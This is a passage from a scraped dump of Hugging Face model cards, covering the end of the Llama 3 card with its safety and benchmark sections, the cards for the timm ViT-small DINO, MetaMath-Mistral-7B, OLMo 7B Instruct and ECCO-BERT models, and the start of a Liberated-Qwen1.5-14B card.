</td>
<td>25.6
</td>
</tr>
<tr>
<td>GSM-8K (8-shot, CoT)
</td>
<td>79.6
</td>
<td>25.7
</td>
<td>77.4
</td>
<td>93.0
</td>
<td>57.5
</td>
</tr>
<tr>
<td>MATH (4-shot, CoT)
</td>
<td>30.0
</td>
<td>3.8
</td>
<td>6.7
</td>
<td>50.4
</td>
<td>11.6
</td>
</tr>
</table>
### Responsibility & Safety
We believe that an open approach to AI leads to better, safer products, faster innovation, and a bigger overall market. We are committed to Responsible AI development and took a series of steps to limit misuse and harm and support the open source community.
Foundation models are widely capable technologies that are built to be used for a diverse range of applications. They are not designed to meet every developer preference on safety levels for all use cases, out-of-the-box, as those by their nature will differ across different applications.
Rather, responsible LLM-application deployment is achieved by implementing a series of safety best practices throughout the development of such applications, from the model pre-training, fine-tuning and the deployment of systems composed of safeguards to tailor the safety needs specifically to the use case and audience.
As part of the Llama 3 release, we updated our [Responsible Use Guide](https://llama.meta.com/responsible-use-guide/) to outline the steps and best practices for developers to implement model and system level safety for their application. We also provide a set of resources including [Meta Llama Guard 2](https://llama.meta.com/purple-llama/) and [Code Shield](https://llama.meta.com/purple-llama/) safeguards. These tools have proven to drastically reduce residual risks of LLM Systems, while maintaining a high level of helpfulness. We encourage developers to tune and deploy these safeguards according to their needs and we provide a [reference implementation](https://github.com/meta-llama/llama-recipes/tree/main/recipes/responsible_ai) to get you started.
#### Llama 3-Instruct
As outlined in the Responsible Use Guide, some trade-off between model helpfulness and model alignment is likely unavoidable. Developers should exercise discretion about how to weigh the benefits of alignment and helpfulness for their specific use case and audience. Developers should be mindful of residual risks when using Llama models and leverage additional safety tools as needed to reach the right safety bar for their use case.
<span style="text-decoration:underline;">Safety</span>
For our instruction tuned model, we conducted extensive red teaming exercises, performed adversarial evaluations and implemented safety mitigations techniques to lower residual risks. As with any Large Language Model, residual risks will likely remain and we recommend that developers assess these risks in the context of their use case. In parallel, we are working with the community to make AI safety benchmark standards transparent, rigorous and interpretable.
<span style="text-decoration:underline;">Refusals</span>
In addition to residual risks, we put a great emphasis on model refusals to benign prompts. Over-refusing not only can impact the user experience but could even be harmful in certain contexts as well. We’ve heard the feedback from the developer community and improved our fine tuning to ensure that Llama 3 is significantly less likely to falsely refuse to answer prompts than Llama 2.
We built internal benchmarks and developed mitigations to limit false refusals making Llama 3 our most helpful model to date.
#### Responsible release
In addition to responsible use considerations outlined above, we followed a rigorous process that requires us to take extra measures against misuse and critical risks before we make our release decision.
Misuse
If you access or use Llama 3, you agree to the Acceptable Use Policy. The most recent copy of this policy can be found at [https://llama.meta.com/llama3/use-policy/](https://llama.meta.com/llama3/use-policy/).
#### Critical risks
<span style="text-decoration:underline;">CBRNE</span> (Chemical, Biological, Radiological, Nuclear, and high yield Explosives)
We have conducted a two fold assessment of the safety of the model in this area:
* Iterative testing during model training to assess the safety of responses related to CBRNE threats and other adversarial risks.
* Involving external CBRNE experts to conduct an uplift test assessing the ability of the model to accurately provide expert knowledge and reduce barriers to potential CBRNE misuse, by reference to what can be achieved using web search (without the model).
### <span style="text-decoration:underline;">Cyber Security </span>
We have evaluated Llama 3 with CyberSecEval, Meta’s cybersecurity safety eval suite, measuring Llama 3’s propensity to suggest insecure code when used as a coding assistant, and Llama 3’s propensity to comply with requests to help carry out cyber attacks, where attacks are defined by the industry standard MITRE ATT&CK cyber attack ontology. On our insecure coding and cyber attacker helpfulness tests, Llama 3 behaved in the same range or safer than models of [equivalent coding capability](https://huggingface.co/spaces/facebook/CyberSecEval).
### <span style="text-decoration:underline;">Child Safety</span>
Child Safety risk assessments were conducted using a team of experts, to assess the model’s capability to produce outputs that could result in Child Safety risks and inform on any necessary and appropriate risk mitigations via fine tuning. We leveraged those expert red teaming sessions to expand the coverage of our evaluation benchmarks through Llama 3 model development. For Llama 3, we conducted new in-depth sessions using objective based methodologies to assess the model risks along multiple attack vectors. We also partnered with content specialists to perform red teaming exercises assessing potentially violating content while taking account of market specific nuances or experiences.
### Community
Generative AI safety requires expertise and tooling, and we believe in the strength of the open community to accelerate its progress. We are active members of open consortiums, including the AI Alliance, Partnership in AI and MLCommons, actively contributing to safety standardization and transparency. We encourage the community to adopt taxonomies like the MLCommons Proof of Concept evaluation to facilitate collaboration and transparency on safety and content evaluations. Our Purple Llama tools are open sourced for the community to use and widely distributed across ecosystem partners including cloud service providers. We encourage community contributions to our [Github repository](https://github.com/meta-llama/PurpleLlama).
Finally, we put in place a set of resources including an [output reporting mechanism](https://developers.facebook.com/llama_output_feedback) and [bug bounty program](https://www.facebook.com/whitehat) to continuously improve the Llama technology with the help of the community.
## Ethical Considerations and Limitations
The core values of Llama 3 are openness, inclusivity and helpfulness. It is meant to serve everyone, and to work for a wide range of use cases. It is thus designed to be accessible to people across many different backgrounds, experiences and perspectives. Llama 3 addresses users and their needs as they are, without insertion unnecessary judgment or normativity, while reflecting the understanding that even content that may appear problematic in some cases can serve valuable purposes in others. It respects the dignity and autonomy of all users, especially in terms of the values of free thought and expression that power innovation and progress.
But Llama 3 is a new technology, and like any new technology, there are risks associated with its use. Testing conducted to date has been in English, and has not covered, nor could it cover, all scenarios. For these reasons, as with all LLMs, Llama 3’s potential outputs cannot be predicted in advance, and the model may in some instances produce inaccurate, biased or other objectionable responses to user prompts. Therefore, before deploying any applications of Llama 3 models, developers should perform safety testing and tuning tailored to their specific applications of the model. As outlined in the Responsible Use Guide, we recommend incorporating [Purple Llama](https://github.com/facebookresearch/PurpleLlama) solutions into your workflows and specifically [Llama Guard](https://ai.meta.com/research/publications/llama-guard-llm-based-input-output-safeguard-for-human-ai-conversations/) which provides a base model to filter input and output prompts to layer system-level safety on top of model-level safety.
Please see the Responsible Use Guide available at [http://llama.meta.com/responsible-use-guide](http://llama.meta.com/responsible-use-guide)
## Citation instructions
@article{llama3modelcard,
title={Llama 3 Model Card},
author={AI@Meta},
year={2024},
url = {https://github.com/meta-llama/llama3/blob/main/MODEL_CARD.md}
}
## Contributors
Aaditya Singh; Aaron Grattafiori; Abhimanyu Dubey; Abhinav Jauhri; Abhinav Pandey; Abhishek Kadian; Adam Kelsey; Adi Gangidi; Ahmad Al-Dahle; Ahuva Goldstand; Aiesha Letman; Ajay Menon; Akhil Mathur; Alan Schelten; Alex Vaughan; Amy Yang; Andrei Lupu; Andres Alvarado; Andrew Gallagher; Andrew Gu; Andrew Ho; Andrew Poulton; Andrew Ryan; Angela Fan; Ankit Ramchandani; Anthony Hartshorn; Archi Mitra; Archie Sravankumar; Artem Korenev; Arun Rao; Ashley Gabriel; Ashwin Bharambe; Assaf Eisenman; Aston Zhang; Aurelien Rodriguez; Austen Gregerson; Ava Spataru; Baptiste Roziere; Ben Maurer; Benjamin Leonhardi; Bernie Huang; Bhargavi Paranjape; Bing Liu; Binh Tang; Bobbie Chern; Brani Stojkovic; Brian Fuller; Catalina Mejia Arenas; Chao Zhou; Charlotte Caucheteux; Chaya Nayak; Ching-Hsiang Chu; Chloe Bi; Chris Cai; Chris Cox; Chris Marra; Chris McConnell; Christian Keller; Christoph Feichtenhofer; Christophe Touret; Chunyang Wu; Corinne Wong; Cristian Canton Ferrer; Damien Allonsius; Daniel Kreymer; Daniel Haziza; Daniel Li; Danielle Pintz; Danny Livshits; Danny Wyatt; David Adkins; David Esiobu; David Xu; Davide Testuggine; Delia David; Devi Parikh; Dhruv Choudhary; Dhruv Mahajan; Diana Liskovich; Diego Garcia-Olano; Diego Perino; Dieuwke Hupkes; Dingkang Wang; Dustin Holland; Egor Lakomkin; Elina Lobanova; Xiaoqing Ellen Tan; Emily Dinan; Eric Smith; Erik Brinkman; Esteban Arcaute; Filip Radenovic; Firat Ozgenel; Francesco Caggioni; Frank Seide; Frank Zhang; Gabriel Synnaeve; Gabriella Schwarz; Gabrielle Lee; Gada Badeer; Georgia Anderson; Graeme Nail; Gregoire Mialon; Guan Pang; Guillem Cucurell; Hailey Nguyen; Hannah Korevaar; Hannah Wang; Haroun Habeeb; Harrison Rudolph; Henry Aspegren; Hu Xu; Hugo Touvron; Iga Kozlowska; Igor Molybog; Igor Tufanov; Iliyan Zarov; Imanol Arrieta Ibarra; Irina-Elena Veliche; Isabel Kloumann; Ishan Misra; Ivan Evtimov; Jacob Xu; Jade Copet; Jake Weissman; Jan Geffert; Jana Vranes; Japhet Asher; Jason Park; Jay Mahadeokar; Jean-Baptiste Gaya; Jeet Shah; Jelmer van der Linde; Jennifer Chan; Jenny Hong; Jenya Lee; Jeremy Fu; Jeremy Teboul; Jianfeng Chi; Jianyu Huang; Jie Wang; Jiecao Yu; Joanna Bitton; Joe Spisak; Joelle Pineau; Jon Carvill; Jongsoo Park; Joseph Rocca; Joshua Johnstun; Junteng Jia; Kalyan Vasuden Alwala; Kam Hou U; Kate Plawiak; Kartikeya Upasani; Kaushik Veeraraghavan; Ke Li; Kenneth Heafield; Kevin Stone; Khalid El-Arini; Krithika Iyer; Kshitiz Malik; Kuenley Chiu; Kunal Bhalla; Kyle Huang; Lakshya Garg; Lauren Rantala-Yeary; Laurens van der Maaten; Lawrence Chen; Leandro Silva; Lee Bell; Lei Zhang; Liang Tan; Louis Martin; Lovish Madaan; Luca Wehrstedt; Lukas Blecher; Luke de Oliveira; Madeline Muzzi; Madian Khabsa; Manav Avlani; Mannat Singh; Manohar Paluri; Mark Zuckerberg; Marcin Kardas; Martynas Mankus; Mathew Oldham; Mathieu Rita; Matthew Lennie; Maya Pavlova; Meghan Keneally; Melanie Kambadur; Mihir Patel; Mikayel Samvelyan; Mike Clark; Mike Lewis; Min Si; Mitesh Kumar Singh; Mo Metanat; Mona Hassan; Naman Goyal; Narjes Torabi; Nicolas Usunier; Nikolay Bashlykov; Nikolay Bogoychev; Niladri Chatterji; Ning Dong; Oliver Aobo Yang; Olivier Duchenne; Onur Celebi; Parth Parekh; Patrick Alrassy; Paul Saab; Pavan Balaji; Pedro Rittner; Pengchuan Zhang; Pengwei Li; Petar Vasic; Peter Weng; Polina Zvyagina; Prajjwal Bhargava; Pratik Dubal; Praveen Krishnan; Punit Singh Koura; Qing He; Rachel Rodriguez; Ragavan Srinivasan; Rahul Mitra; Ramon Calderer; Raymond Li; Robert Stojnic; Roberta Raileanu; Robin Battey; Rocky Wang; Rohit Girdhar; Rohit Patel; Romain Sauvestre; Ronnie Polidoro; Roshan Sumbaly; Ross Taylor; Ruan Silva; Rui Hou; Rui Wang; Russ Howes; Ruty Rinott; Saghar Hosseini; Sai Jayesh Bondu; Samyak Datta; Sanjay Singh; Sara Chugh; Sargun Dhillon; Satadru Pan; Sean Bell; Sergey Edunov; Shaoliang Nie; Sharan Narang; Sharath Raparthy; Shaun Lindsay; Sheng Feng; Sheng Shen; Shenghao Lin; Shiva Shankar; Shruti Bhosale; Shun Zhang; Simon Vandenhende; Sinong Wang; Seohyun Sonia Kim; Soumya Batra; Sten Sootla; Steve Kehoe; Suchin Gururangan; Sumit Gupta; Sunny Virk; Sydney Borodinsky; Tamar Glaser; Tamar Herman; Tamara Best; Tara Fowler; Thomas Georgiou; Thomas Scialom; Tianhe Li; Todor Mihaylov; Tong Xiao; Ujjwal Karn; Vedanuj Goswami; Vibhor Gupta; Vignesh Ramanathan; Viktor Kerkez; Vinay Satish Kumar; Vincent Gonguet; Vish Vogeti; Vlad Poenaru; Vlad Tiberiu Mihailescu; Vladan Petrovic; Vladimir Ivanov; Wei Li; Weiwei Chu; Wenhan Xiong; Wenyin Fu; Wes Bouaziz; Whitney Meers; Will Constable; Xavier Martinet; Xiaojian Wu; Xinbo Gao; Xinfeng Xie; Xuchao Jia; Yaelle Goldschlag; Yann LeCun; Yashesh Gaur; Yasmine Babaei; Ye Qi; Yenda Li; Yi Wen; Yiwen Song; Youngjin Nam; Yuchen Hao; Yuchen Zhang; Yun Wang; Yuning Mao; Yuzi He; Zacharie Delpierre Coudert; Zachary DeVito; Zahra Hankir; Zhaoduo Wen; Zheng Yan; Zhengxing Chen; Zhenyu Yang; Zoe Papakipos
|
timm/vit_small_patch8_224.dino | timm | "2024-02-09T18:10:48Z" | 3,638 | 1 | timm | [
"timm",
"pytorch",
"safetensors",
"image-feature-extraction",
"arxiv:2104.14294",
"arxiv:2010.11929",
"license:apache-2.0",
"region:us"
] | image-feature-extraction | "2022-12-22T07:52:53Z" | ---
license: apache-2.0
library_name: timm
tags:
- image-feature-extraction
- timm
---
# Model card for vit_small_patch8_224.dino
A Vision Transformer (ViT) image feature model. Trained with Self-Supervised DINO method.
## Model Details
- **Model Type:** Image classification / feature backbone
- **Model Stats:**
- Params (M): 21.7
- GMACs: 16.8
- Activations (M): 32.9
- Image size: 224 x 224
- **Papers:**
- Emerging Properties in Self-Supervised Vision Transformers: https://arxiv.org/abs/2104.14294
- An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale: https://arxiv.org/abs/2010.11929v2
- **Pretrain Dataset:** ImageNet-1k
- **Original:** https://github.com/facebookresearch/dino
## Model Usage
### Image Classification
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model('vit_small_patch8_224.dino', pretrained=True)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # unsqueeze single image into batch of 1
top5_probabilities, top5_class_indices = torch.topk(output.softmax(dim=1) * 100, k=5)
```
### Image Embeddings
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model(
'vit_small_patch8_224.dino',
pretrained=True,
num_classes=0, # remove classifier nn.Linear
)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # output is (batch_size, num_features) shaped tensor
# or equivalently (without needing to set num_classes=0)
output = model.forward_features(transforms(img).unsqueeze(0))
# output is unpooled, a (1, 785, 384) shaped tensor
output = model.forward_head(output, pre_logits=True)
# output is a (1, num_features) shaped tensor
```
## Model Comparison
Explore the dataset and runtime metrics of this model in timm [model results](https://github.com/huggingface/pytorch-image-models/tree/main/results).
## Citation
```bibtex
@inproceedings{caron2021emerging,
title={Emerging properties in self-supervised vision transformers},
author={Caron, Mathilde and Touvron, Hugo and Misra, Ishan and J{'e}gou, Herv{'e} and Mairal, Julien and Bojanowski, Piotr and Joulin, Armand},
booktitle={Proceedings of the IEEE/CVF international conference on computer vision},
pages={9650--9660},
year={2021}
}
```
```bibtex
@article{dosovitskiy2020vit,
title={An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale},
author={Dosovitskiy, Alexey and Beyer, Lucas and Kolesnikov, Alexander and Weissenborn, Dirk and Zhai, Xiaohua and Unterthiner, Thomas and Dehghani, Mostafa and Minderer, Matthias and Heigold, Georg and Gelly, Sylvain and Uszkoreit, Jakob and Houlsby, Neil},
journal={ICLR},
year={2021}
}
```
```bibtex
@misc{rw2019timm,
author = {Ross Wightman},
title = {PyTorch Image Models},
year = {2019},
publisher = {GitHub},
journal = {GitHub repository},
doi = {10.5281/zenodo.4414861},
howpublished = {\url{https://github.com/huggingface/pytorch-image-models}}
}
```
|
meta-math/MetaMath-Mistral-7B | meta-math | "2023-12-21T01:39:02Z" | 3,638 | 89 | transformers | [
"transformers",
"pytorch",
"mistral",
"text-generation",
"dataset:meta-math/MetaMathQA",
"arxiv:2309.12284",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-10-22T11:12:15Z" | ---
license: apache-2.0
datasets:
- meta-math/MetaMathQA
---
see our paper in https://arxiv.org/abs/2309.12284
View the project page:
https://meta-math.github.io/
## Note
All MetaMathQA data are augmented from the training sets of GSM8K and MATH.
<span style="color:red"><b>None of the augmented data is from the testing set.</b></span>
You can check the `original_question` in `meta-math/MetaMathQA`, each item is from the GSM8K or MATH train set.
## Model Details
MetaMath-Mistral-7B is fully fine-tuned on the MetaMathQA datasets and based on the powerful Mistral-7B model. It is glad to see using MetaMathQA datasets and change the base model from llama-2-7B to Mistral-7b can boost the GSM8K performance from 66.5 to **77.7**.
To fine-tune Mistral-7B, I would suggest using a smaller learning rate (usually 1/5 to 1/10 of the lr for LlaMa-2-7B) and staying other training args unchanged.
More training details and scripts can be seen at https://github.com/meta-math/MetaMath
## Installation
```
pip install transformers==4.35.0
pip install torch==2.0.1
pip install sentencepiece==0.1.99
pip install tokenizers==0.13.3
pip install accelerate==0.21.0
pip install bitsandbytes==0.40.0
pip install vllm
pip install fraction
pip install protobuf
```
## Model Usage
prompting template:
'''
"Below is an instruction that describes a task. "
"Write a response that appropriately completes the request.\n\n"
"### Instruction:\n{instruction}\n\n### Response: Let's think step by step."
'''
where you need to use your query question to replace the {instruction}
There is another interesting repo about Arithmo-Mistral-7B in https://huggingface.co/akjindal53244/Arithmo-Mistral-7B, where they combine our MetaMathQA dataset and MathInstruct datasets to train a powerful model. Thanks agian for their contributions.
We would also try to train the combination of **MetaMathQA** and **MathInstruct** datasets, and also open all the results and training details.
## Experiments
| Model | GSM8k Pass@1 | MATH Pass@1 |
|---------------------|--------------|-------------|
| MPT-7B | 6.8 | 3.0 |
| Falcon-7B | 6.8 | 2.3 |
| LLaMA-1-7B | 11.0 | 2.9 |
| LLaMA-2-7B | 14.6 | 2.5 |
| MPT-30B | 15.2 | 3.1 |
| LLaMA-1-13B | 17.8 | 3.9 |
| GPT-Neo-2.7B | 19.5 | -- |
| Falcon-40B | 19.6 | 2.5 |
| Baichuan-chat-13B | 23.9 | -- |
| Vicuna-v1.3-13B | 27.6 | -- |
| LLaMA-2-13B | 28.7 | 3.9 |
| InternLM-7B | 31.2 | -- |
| ChatGLM-2-6B | 32.4 | -- |
| GPT-J-6B | 34.9 | -- |
| LLaMA-1-33B | 35.6 | 3.9 |
| LLaMA-2-34B | 42.2 | 6.24 |
| RFT-7B | 50.3 | -- |
| LLaMA-1-65B | 50.9 | 10.6 |
| Qwen-7B | 51.6 | -- |
| WizardMath-7B | 54.9 | 10.7 |
| LLaMA-2-70B | 56.8 | 13.5 |
| WizardMath-13B | 63.9 | 14.0 |
| MAmmoTH-7B (COT) | 50.5 | 10.4 |
| MAmmoTH-7B (POT+COT)| 53.6 | 31.5 |
| Arithmo-Mistral-7B | 74.7 | 25.3 |
| MetaMath-7B | 66.5 | 19.8 |
| MetaMath-13B | 72.3 | 22.4 |
| 🔥 **MetaMath-Mistral-7B** | **77.7** | **28.2** |
## Citation
```bibtex
@article{yu2023metamath,
title={MetaMath: Bootstrap Your Own Mathematical Questions for Large Language Models},
author={Yu, Longhui and Jiang, Weisen and Shi, Han and Yu, Jincheng and Liu, Zhengying and Zhang, Yu and Kwok, James T and Li, Zhenguo and Weller, Adrian and Liu, Weiyang},
journal={arXiv preprint arXiv:2309.12284},
year={2023}
}
```
```bibtex
@article{jiang2023mistral,
title={Mistral 7B},
author={Jiang, Albert Q and Sablayrolles, Alexandre and Mensch, Arthur and Bamford, Chris and Chaplot, Devendra Singh and Casas, Diego de las and Bressand, Florian and Lengyel, Gianna and Lample, Guillaume and Saulnier, Lucile and others},
journal={arXiv preprint arXiv:2310.06825},
year={2023}
}
``` |
allenai/OLMo-7B-Instruct-hf | allenai | "2024-06-04T20:43:45Z" | 3,636 | 0 | transformers | [
"transformers",
"pytorch",
"olmo",
"text-generation",
"conversational",
"en",
"dataset:allenai/dolma",
"dataset:allenai/tulu-v2-sft-mixture",
"dataset:allenai/ultrafeedback_binarized_cleaned",
"arxiv:2402.00838",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | "2024-06-04T19:54:24Z" | ---
license: apache-2.0
datasets:
- allenai/dolma
- allenai/tulu-v2-sft-mixture
- allenai/ultrafeedback_binarized_cleaned
language:
- en
---
<img src="https://allenai.org/olmo/olmo-7b-animation.gif" alt="OLMo Logo" width="800" style="margin-left:'auto' margin-right:'auto' display:'block'"/>
# Model Card for OLMo 7B Instruct
<!-- Provide a quick summary of what the model is/does. -->
OLMo is a series of **O**pen **L**anguage **Mo**dels designed to enable the science of language models.
The OLMo base models are trained on the [Dolma](https://huggingface.co/datasets/allenai/dolma) dataset.
The adapted versions are trained on the [Tulu SFT mixture](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture) and, for the Instruct version, a [cleaned version of the UltraFeedback dataset](https://huggingface.co/datasets/allenai/ultrafeedback_binarized_cleaned).
We release all code, checkpoints, logs, and details involved in training these models.
OLMo 7B Instruct and OLMo SFT are two adapted versions of these models trained for better question answering.
They show the performance gain that OLMo base models can achieve with existing fine-tuning techniques.
**This version is for direct use with HuggingFace Transformers** from v4.40 on.
## Model Details
We release two adapted model versions:
The base models related to this adapted model are the following:
| Model | Training Method(s) | Datasets | Context Length |
|------|--------|---------|--|
| [OLMo 7B SFT](https://huggingface.co/allenai/OLMo-7B-SFT) | SFT | [Tulu 2 SFT Mix](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture) | 2048 |
| [OLMo 7B Instruct](https://huggingface.co/allenai/OLMo-7B-Instruct) | SFT + DPO | [Tulu 2 SFT Mix](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture) + [Ultrafeedback Cleaned](https://huggingface.co/datasets/allenai/ultrafeedback_binarized_cleaned) | 2048 |
The base models related to this adapted model are the following:
| Size | Training Tokens | Layers | Hidden Size | Attention Heads | Context Length |
|------|--------|---------|-------------|-----------------|----------------|
| [OLMo 1B](https://huggingface.co/allenai/OLMo-1B) | 3 Trillion |16 | 2048 | 16 | 2048 |
| [OLMo 7B](https://huggingface.co/allenai/OLMo-7B) | 2.5 Trillion | 32 | 4096 | 32 | 2048 |
| [OLMo 7B Twin 2T](https://huggingface.co/allenai/OLMo-7B-Twin-2T) | 2 Trillion | 32 | 4096 | 32 | 2048 |
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** Allen Institute for AI (AI2)
- **Supported by:** Databricks, Kempner Institute for the Study of Natural and Artificial Intelligence at Harvard University, AMD, CSC (Lumi Supercomputer), UW
- **Model type:** a Transformer style autoregressive language model.
- **Language(s) (NLP):** English
- **License:** The code and model are released under Apache 2.0.
- **Contact:** Technical inquiries: `olmo at allenai dot org`. Press: `press at allenai dot org`
- **Date cutoff:** Feb./March 2023 based on Dolma dataset version.
### Model Sources
<!-- Provide the basic links for the model. -->
- **Project Page:** https://allenai.org/olmo
- **Repositories:**
- Core repo (training, inference, fine-tuning etc.): https://github.com/allenai/OLMo
- Evaluation code: https://github.com/allenai/OLMo-Eval
- Further fine-tuning code: https://github.com/allenai/open-instruct
- **Paper:** [Link](https://arxiv.org/abs/2402.00838)
- **Technical blog post:** https://blog.allenai.org/olmo-open-language-model-87ccfc95f580
- **W&B Logs:** https://wandb.ai/ai2-llm/OLMo-7B/reports/OLMo-7B--Vmlldzo2NzQyMzk5
<!-- - **Press release:** TODO -->
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Inference
You can load and run this model as usual so long as your HuggingFace version is >= 4.40:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
olmo = AutoModelForCausalLM.from_pretrained("allenai/OLMo-7B-Instruct-hf")
tokenizer = AutoTokenizer.from_pretrained("allenai/OLMo-7B-Instruct-hf")
message = [{"role": "user", "content": "What is 2+2?"}]
inputs = tokenizer.apply_chat_template(messages, tokenize=True, add_generation_prompt=True, return_tensors="pt")
# optional verifying cuda
# inputs = {k: v.to('cuda') for k,v in inputs.items()}
# olmo = olmo.to('cuda')
response = olmo.generate(**inputs, max_new_tokens=100, do_sample=True, top_k=50, top_p=0.95)
print(tokenizer.batch_decode(response, skip_special_tokens=True)[0])
>> '2+2=4'
```
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
Core model results for the 7B adapted models are found below.
| Model | MMLU 0-shot ↑ | AlpacaEval %win ↑ | ToxiGen % Toxic ↓ | TruthfulQA %Info+True ↑ |
|-----------------------|---------------|--------------------|--------------------|-------------------------|
| **OLMo (base)** | 28.3 | - | 81.4 | 31.6 |
| MPT Chat | 33.8 | 46.8 | 0.1 | 42.7 |
| Falcon Instruct | 25.2 | 14.0 | 70.7 | 27.2 |
| RPJ-INCITE Chat | 27.0 | 38.0 | 46.4 | 53.0 |
| Llama-2-Chat 7B | 46.8 | 87.3 | 0.0 | 26.3 |
| AI2 Tulu 2 7B | 50.4 | 73.9 | 7.0 | 51.7 |
| AI2 Tulu 2 7B DPO | 50.7 | 85.1 | 0.5 | - * |
| **[OLMo 7B SFT](https://huggingface.co/allenai/OLMo-7B-SFT)** | 47.3 | 57.0 | 14.4 | 41.2 |
| **[OLMo 7B Instruct](https://huggingface.co/allenai/OLMo-7B-Instruct)** | 46.2 | 69.3 | 1.7 | 52.0 |
*Following Ivison et al. 2023, we do not report Tulu 2 TruthfulQA scores due to test set contamination.
## Model Details
### Data
For training data details, please see the [Dolma](https://huggingface.co/datasets/allenai/dolma), [Tulu 2](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture), and [UltraFeedback](https://huggingface.co/datasets/openbmb/UltraFeedback) documentation.
### Architecture
### Hyperparameters
The hyperparameters for the two phases of training are below:
| | Learning Rate | Beta | Epochs | Warmup | Weight Decay | Gradient Clipping | Maximum Sequence Length |
|-------------------------|---------------|------|--------|------------------------------------------------------------------------|--------------|-------------------|-------------------------|
| **SFT** | 2 × 10^-6 | N/A | 3 | Linear warmup for the first 3% of total training time, then cooldown to 0 | 0 | 0 | 2048 |
| **DPO** | 5 × 10^-7 | 0.1 | 3 | Linear warmup for the first 10% of total training time, then cooldown to 0| 0 | 0 | 2048 |
Compared to Tulu 2, DPO hyperparameters are the same. SFT is lower LR and 3 epochs instead of 2 (and 2k length instead of 8k).
## Bias, Risks, and Limitations
This adapted OLMo model is a research artifact.
It is intended to benefit the research community interested in understanding the safety properties of LLMs and developers building safety tools for LLMs.
For this reason, the model does not include a specific safety filter or safety training data.
While our model scores well relative to its peers on ToxiGen, it is possible for the model to generate harmful and sensitive content from some user prompts.
We recommend developers exercise caution and consider the risks of the applications of this technology.
Furthermore, developers should consider implementing safeguards for biases, privacy, and other potential harms when appropriate.
Finally, as with every LLM, OLMo may produce factual-sounding outputs that may not be true, so developers and users are encouraged to confirm such outputs before relying on them.
All users of this model are responsible for how they use the model.
## Citation
**BibTeX:**
```
@article{Groeneveld2023OLMo,
title={OLMo: Accelerating the Science of Language Models},
author={Groeneveld, Dirk and Beltagy, Iz and Walsh, Pete and Bhagia, Akshita and Kinney, Rodney and Tafjord, Oyvind and Jha, Ananya Harsh and Ivison, Hamish and Magnusson, Ian and Wang, Yizhong and Arora, Shane and Atkinson, David and Authur, Russell and Chandu, Khyathi and Cohan, Arman and Dumas, Jennifer and Elazar, Yanai and Gu, Yuling and Hessel, Jack and Khot, Tushar and Merrill, William and Morrison, Jacob and Muennighoff, Niklas and Naik, Aakanksha and Nam, Crystal and Peters, Matthew E. and Pyatkin, Valentina and Ravichander, Abhilasha and Schwenk, Dustin and Shah, Saurabh and Smith, Will and Subramani, Nishant and Wortsman, Mitchell and Dasigi, Pradeep and Lambert, Nathan and Richardson, Kyle and Dodge, Jesse and Lo, Kyle and Soldaini, Luca and Smith, Noah A. and Hajishirzi, Hannaneh},
journal={Preprint},
year={2024}
}
```
**APA:**
Groeneveld, D., Beltagy, I., Walsh, P., Bhagia, A., Kinney, R., Tafjord, O., Jha, A., Ivison, H., Magnusson, I., Wang, Y., Arora, S., Atkinson, D., Authur, R., Chandu, K., Cohan, A., Dumas, J., Elazar, Y., Gu, Y., Hessel, J., Khot, T., Merrill, W., Morrison, J., Muennighoff, N., Naik, A., Nam, C., Peters, M., Pyatkin, V., Ravichander, A., Schwenk, D., Shah, S., Smith, W., Subramani, N., Wortsman, M., Dasigi, P., Lambert, N., Richardson, K., Dodge, J., Lo, K., Soldaini, L., Smith, N., & Hajishirzi, H. (2024). OLMo: Accelerating the Science of Language Models. Preprint.
## Model Card Contact
For errors in this model card, contact Nathan or Jacob, `{nathanl, jacobm} at allenai dot org`. |
TurkuNLP/eccobert-base-cased-v1 | TurkuNLP | "2022-04-13T16:57:18Z" | 3,634 | 0 | transformers | [
"transformers",
"pytorch",
"bert",
"pretraining",
"en",
"endpoints_compatible",
"region:us"
] | null | "2022-04-09T19:11:30Z" | ---
language: en
---
# ECCO-BERT base model (cased)
A pretrained BERT model trained exclusively on the ECCO (Eighteenth Century Collections Online) dataset of digitized documents published during the 18th century in the United Kingdom. The model is equivalent in size to [bert-base-cased](https://huggingface.co/bert-base-cased). The model is intended for fine-tuning on various tasks that use the ECCO dataset.
Documentation in progress... |
abacusai/Liberated-Qwen1.5-14B | abacusai | "2024-03-05T05:53:24Z" | 3,634 | 16 | transformers | [
"transformers",
"pytorch",
"qwen2",
"text-generation",
"conversational",
"en",
"dataset:teknium/OpenHermes-2.5",
"dataset:m-a-p/Code-Feedback",
"dataset:m-a-p/CodeFeedback-Filtered-Instruction",
"dataset:abacusai/SystemChat",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-03-05T05:45:22Z" | ---
license: other
license_name: tongyi-qianwen
license_link: https://huggingface.co/Qwen/Qwen1.5-72B/blob/main/LICENSE
datasets:
- teknium/OpenHermes-2.5
- m-a-p/Code-Feedback
- m-a-p/CodeFeedback-Filtered-Instruction
- abacusai/SystemChat
language:
- en
---
